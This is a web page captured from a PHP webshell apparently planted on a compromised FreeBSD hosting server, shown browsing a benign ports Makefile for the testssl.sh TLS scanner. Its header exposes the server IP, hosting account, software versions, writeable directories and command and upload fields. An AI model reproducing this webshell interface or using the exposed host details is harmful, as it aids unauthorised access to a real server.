403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.89
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/security/testssl.sh/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/security/testssl.sh/Makefile
PORTNAME=	testssl.sh
DISTVERSIONPREFIX=	v
DISTVERSION=	3.0.8
CATEGORIES=	security

MAINTAINER=	adamw@FreeBSD.org
COMMENT=	Analyze and report TLS/SSL configuration/misconfiguration
WWW=		https://github.com/drwetter/testssl.sh

LICENSE=	GPLv2
LICENSE_FILE=	${WRKSRC}/LICENSE

RUN_DEPENDS=	openssl-unsafe>=1.0.1:security/openssl-unsafe \
		bash:shells/bash
TEST_DEPENDS=	p5-JSON>=0:converters/p5-JSON

USES=		perl5 shebangfix
USE_GITHUB=	yes
GH_ACCOUNT=	drwetter

SHEBANG_FILES=	testssl.sh utils/*

USE_PERL5=	test
TEST_ENV=	TESTSSL_INSTALL_DIR=${WRKSRC}

NO_ARCH=	yes
NO_BUILD=	yes

post-patch:
	${REINPLACE_CMD} -e 's|%%PREFIX%%|${PREFIX}|; s|%%DATADIR%%|${DATADIR}|' \
		${WRKSRC}/testssl.sh

do-install:
	${INSTALL_SCRIPT} ${WRKSRC}/testssl.sh ${STAGEDIR}${PREFIX}/bin
	${INSTALL_MAN} ${WRKSRC}/doc/testssl.1 ${STAGEDIR}${MAN1PREFIX}/man/man1
	cd ${WRKSRC} && ${COPYTREE_SHARE} "etc utils" ${STAGEDIR}${DATADIR}

do-test:
# Run the badssl.com test as a sanity check.  The full test suite
# opens too many network connections and might take too long to
# run.
	cd ${WRKSRC} && ${SETENV} ${TEST_ENV} prove -v t/51_badssl.com.t

.include <bsd.port.mk>

Youez - 2016 - github.com/yon3zu
LinuXploit